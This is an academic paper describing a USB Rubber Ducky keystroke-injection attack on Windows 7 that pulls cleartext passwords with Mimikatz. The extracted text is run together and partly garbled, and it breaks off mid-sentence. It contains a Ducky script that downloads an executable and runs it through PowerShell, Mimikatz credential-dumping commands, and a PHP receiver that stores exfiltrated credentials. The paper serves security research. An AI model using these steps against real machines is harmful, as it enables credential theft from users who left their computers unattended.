Hacking Experiment by Using USB Rubber Ducky ScriptingBenjamin CannolsDepartment of CSIS, University of North GeorgiaDahlonega, Georgia 30597, USAandAhmad GhafarianDepartment of CSIS, University of North GeorgiaDahlonega, GA 30597, USAABSTRACTBy leaving your computer unlocked while you are away forseconds can give hackers all the time they need to obtain yourpersonal information from your computer. This paper aims todetail the necessary research and development of a USBRubber Ducky script, to obtain clear text logon id andpasswords from a Windows machine, in mere seconds. Eachstage is laid out in sections discussing Ducky script,powershell, Mimikatz, and reenabling the vulnerability bybreaking down the attack into two parts for Windows 7 and upoperating systems.Keywords: USB Rubber Ducky,powershell, mimikatz, and duck tool kit.hacking,scripting,1. INTRODUCTIONNearly every computer including desktops, laptops, tablets andsmartphone take input from humans via keyboards. This ispossible because there is a specification with every ubiquitousUSB standard known as Human Interface Device (HID).Practically, this means that any USB device claiming to be aKeyboard HID will be automatically detected and accepted bymost modern operating systems including Windows, Mac OS,Linux or Android.The USB interface is generally a dangerous vector for attack.In many organizations, use of USB flash drives is restricted due to their potential for being used as a hacking tool.Examples of USB storage usages to serve as a malwaredelivery mechanism are provided in various research paperssuch as [3, 7, 8, 9]. Recently an even more insidious form ofUSB-based attack has emerged known as BadUSB [2, 5]. TheBadUSB device registers as multiple device types, allowing thedevice to take covert actions on the host machine. For example,a USB flash drive could register itself as a device or akeyboard, enabling the ability to inject malicious scripts. Thisfunctionality is present in the Rubber Ducky penetration testingtool . Unfortunately, because USB device firmware cannotbe scanned by the host machine, antivirus software cannotdetect or defend against this attack. According to  thisproblem is not just limited to dubious flash drives. Any devicethat communicates over USB is susceptible to this kind ofattack. Moreover, existing USB security solutions, such aswhitelisting individual devices by their serial number, are notadequate when considering malicious firmware that can make66SYSTEMICS, CYBERNETICS AND INFORMATICSspurious claims about its identity during device enumeration.Standard USB devices are too simplistic to reliablyauthenticate, and secure devices with signed firmware thatcould permit authentication are rare, leaving it unclear how todefend ourselves against this new attack.There exist several methods to penetrate a machine as a hackeror a penetration tester such as social engineering, exploitingvulnerabilities of the system, etc. One of the practical strategiesused by the hackers is to plug in a USB stick to a machine. Thiscan be done by using a USB device detected by a victim'scomputer as a HID (this is called BadUSB) and running codewithout the knowledge or consent of the victim. For example, ifthe user is away for lunch and left his or her computerunattended, the hacker can plug in the USB in the victim’smachine for malicious purposes.Several attempts have been made by researchers to mitigate thedangers of hacking to a machine via BadUSB. One of suchmethods is provided by Vouteva . The author provided aproof of concept for the feasibility and deployment of BadUSBby using an Arduino Micro  as a replacement for aBadUSB.In this paper we present the details of our approach inimplementing the penetration into a Windows machine viaUSB Rubber Ducky and scripting. The mechanism allows ahacker to attack an unattended machine and retrieve sensitiveinformation such as user identification and clear text passwordfrom the victim machine. We will utilize several tools andtechnologies such as powershell, Mimikatz, scripting language,web server and PHP technology.The rest of this paper is organized as follows. In section 2 wereview the literature. Section 3 covers keylogger enabled USBand other hacking mechanisms related to USB. The tools andtechnologies used in this research are described in section 4.Section 5 discusses the attack method and its implementation.The conclusion appears in section 6. Section 7 presentsreferences.2. LITERATURE REVIEWIn this section we explain some of the previous research in boththe areas of using USB as an attack vector and the mechanismsfor preventing attacks related to USBs.VOLUME 15 - NUMBER 2 - YEAR 2017ISSN: 1690-4524
At Black Hat 2015, Nohl and Lell presented USB attackscenarios using a BadUSB . The authors demonstrated thatit is possible to use a USB to redirect the user's DNS queries toan attacker's DNS server. In a related work Kamkar demonstrates a Teensy USB microcontroller, configured toinstall a backdoor and change the DNS settings of an unlockedmachine. Recently, a method of using a BadUSB has beendeveloped by Nikhil Mittal (SamratAshok) in a tool calledKautilya . The tool has functionality like informationgathering and script executions which leads to hacking thevictim machine.It is not uncommon for people to leave their computersunattended, even if only for few minutes. These few minutes isall it takes for usernames and passwords to be stolen by amalicious hacker using the USB Rubber Ducky or a similartool. Whether it is a local account or a Microsoft account,vulnerability exists in Windows and many other operatingsystems. Clear text passwords are stored in the computer’smain memory that can be extracted using a program calledMimikatz designed by Benjamin Delpy . One of manyfunctions included in Mimikatz is the sekurlsa function, whichspecifically targets logon passwords and hashes.With the aim of mitigating the risks posed by USBs, theauthors in  built a BadUSB device and tested it in acontrolled OS environment. Based on the results of their tests,they make recommendations on how to control the security of amachine.This research exploits Windows vulnerability utilizing the USBRubber Ducky. For this project the victim machine will berunning windows 7 with windows defender for its antivirus,signed in to a Microsoft account owned by the victim. In thenext section we describe the details of the tools and technologyneeded to construct and launch an attack.In another published research paper the authors exploit severalUSB features to establish a rogue HTTP channel used to leakdata stored on the device's disk to an Internet back end .To mitigate the dangers of using keylogger enabled USB, theauthors in  built a method called USBWall with aim ofpreventing an attack. The authors compared their USBWallwith other commercially available antivirus products. In theircontrolled environment, they report that USBWall iscomparative to commercial anti-virus software.3. USB KEYLOGGINGKeylogger software has the capability to record everykeystroke a user makes to a log file. It can record informationsuch as user id, password, instant messages, and e-mail. Detailof Keyloggers performance and whether they needadministrative access to the target machine or not are discussedin . In recent years there has been some hardwaredevelopment that enhances the task of keylogging. In thissection we describe the specification of one of that hardwarethat we use in this research.USB Rubber Ducky has been developed by Hak5 . ThisUSB key includes a 60MHz programmable microcontroller anda SD slot. It behaves like a keyboard and it looks like USBflash drives. It can be easily hidden on a computer port.Another feature of this device is that it may be hidden in thetask manager; it is assumed that its power consumption may berevealed with physical measurements. However, to use theUSB Rubber Ducky we need physical access to the victim’smachine and we need to write a malware to be injected in thedevice.Computers inherently trust devices that claim to be a HID. It’sthrough these devices that humans interact with and accomplishtheir daily tasks on all computers including desktops, laptops,tablets, and smart phones. The USB rubber ducky is akeyboard emulator disguised within a USB thumb drive case.It has been used by IT professionals, pen testers and hackerssince 2010 and has become the most used commercialkeystroke injection attack platform in the business. Combinedwith its scripting language, payloads can be written anddeployed.ISSN: 1690-45244. TOOLS AND TECHNOLOGIESWe have employed several hardware and software toolsto implement this project. This section outlines thosetools and technologies.4.1 Target MachineFor the target machine we use a physical machine runningWindows 7, 64-bits Ultimate Edition with all patches appliedand having windows defender as the antivirus software.4.2 USB Rubber Ducky HardwareWe use a USB Rubber Ducky for attack media (Hak5 ), Thislooks a USB flash drive which can be plugged into the victim’smachine. The average USB Rubber Ducky includes a 60MHzprogrammable microcontroller and a SD slot. Some of thefeatures of this device include behaving like a keyboard; it doesnot show in the task manager and its power consumption maybe revealed with physical measurements.4.3 Scripting LanguageTo write malware payload we use Rubber Ducky scriptinglanguage. Writing scripts can be done from any common texteditor such as Notepad. Each command must be written on anew line all in caps, and may have options follow. Thecommands can invoke keystrokes, key-combos or strings oftext as well as offering delays or pauses. The two mostcommon commands are DELAY and STRING. DELAY isfollowed by a number that represents milliseconds. Forexample, the line “DELAY 2000” instructs the Rubber Duckyto wait 2 full seconds before proceeding to the next line ofcode. This is extremely important in making sure the scriptruns smoothly and effectively. Since the Ducky is extremelyfast, some computers may not be able to keep up. Thiscommand prohibits the Ducky to move faster than thecomputer will be able to follow. The STRING commandinstructs Rubber to process the text following STRING. It canaccept a single or multiple characters. Also, the commandWINDOWS (or GUI) emulates the Windows-key. Figure 1shows an example of script  which displays Hallow World! Iam in your PC.SYSTEMICS, CYBERNETICS AND INFORMATICSVOLUME 15 - NUMBER 2 - YEAR 201767
somewhat limited in Windows 8.1 and 10. Below is an exampleexecution to look for passwords on a system.privilege::debugSekurlsa::logonpasswords5. CREATING PAYLOAD AND LAUNCHING THEATTACKFigure 1- An example of Rubber Script4.4 Duck Toolkit NGThe Duck Toolkit NG is an open source penetration testingplatform that allows user to generate USB Rubber Ducky payloads for use on Windows, Linux, Mac OSX and manyother popular operating systems. We can choose from pre builtpayloads, create our own payloads and decode existingpayloads. Using the toolkits require administrative access,powershell, and Internet access.4.5 PwershellPowershell is an object-oriented programming language andinteractive command line shell for Microsoft Windows.Powershell automates system tasks, such as batch processing,and create systems management tools for commonlyimplemented processes. Figure 2 shows an example ofpowershell for downloading a file from a website and theexecuting it which is due to .DELAY 3000GUI rDELAY 100STRING powershell p://example.com/bob.old','%TEMP%\bob.exe');DELAY 100STRING Start-Process "%TEMP%\bob.exe"ENTERFigure 2-An example of Powersell4.6 Web ServerSince we are going to execute the malware remotely from theweb, we need a web server with PHP capability to upload anddownload malware executable files.4.7 MimikatzMimikatz  is an open-source utility that enables theviewing of credential information from the Windows LSASS(Local Security Authority Subsystem Service) through itssekurlsa module which includes plaintext passwords andKerberos tickets and much more. Most antivirus tools willdetect the presence of Mimikatz as a threat and delete it but it ispossible to go around that. Mimikatz can be executed bothlocally from the command line and remotely. To run Mimikatzfrom the command line, we need mimikatz.exe and sekurlsa.dllon the target machine. This approach is not desirable in thisresearch because we want to be able to use the USB RubberDucky and bypass hard drive. To run it remotely, first we'llestablish a connection to the servers then just copy oversekurlsa.dll and run it. Mimikatz tools run on all versions ofWindows from XP forward. However, its functionality is68SYSTEMICS, CYBERNETICS AND INFORMATICSThis section details the process of exploiting Windowsvulnerability by creating an attack payload for retrieving userid and password from the victim’s machine. For this project,the victim machine will be running Windows 7 with windowsdefender as its antivirus.5.1 Using Ducky Script to Create PayloadWe used Ducky scripting, which was introduced in section 4.3and wrote our own malware script in a notepad and saved it asa text file. This text file was then encoded into an inject.binfile. The Following statement converts the script text file to a.bin file.java -jar duckencode.jar -i payload.txt -o inject.binOnce we created the inject.bin file, we injected it onto themicroSD card which was then inserted in the USB RubberDucky hardware. At this point the Ducky is ready for the firstpart of the attack.5.2 Configuring Mimikatz for File Upload/DownloadWe used Ducky scripting, which was introduced in section 4.3and wrote our own malware script in a notepad and saved it asa text file. This text file was then encoded into an inject.binfile. The Following statement converts the script text file to a.bin file.The next step is to obtain a copy of the Mimikatz executableand upload to a hosting service of your choosing, or your ownprivate webserver. For this project we chose Google Driveaccount to upload the executable file. When the file wasuploaded we utilized a direct link generator to obtain thedownload link for the Mikimatz as this is how it will downloadand run from powershell. Uploading the credentials was a littlemore in-depth. We created a PHP (Figure 3) page on ourwebsite to listen for the file coming in, and then save it. Thisreceives the file and saves it in the current directory of the PHPfile.“Credentials VictimIPAddress CurrentDatemimikatz.log”. ?php uploadDir ‘Credentials’.” “. SERVER[‘REMOTE ADD’].” ”.date(“Ym-d H-i-s”); uploadFie UploadDirc.basename( FILES[‘file’][‘name’]);? Figure 3- PHP file for uploading files5.3 Required Powershell ScriptAfter the download and upload locations were set, we neededto figure out the powershell scripting required. When theRubber Ducky is plugged in, we are going to have to getp
Rubber Ducky script, to obtain clear text logon id and passwords from a Windows machine, in mere seconds. Each stage is laid out in sections discussing Ducky script, powershell, Mimikatz, and reenabling the vulnerability by breaking down the attack into two parts for Windows 7 and up operating systems.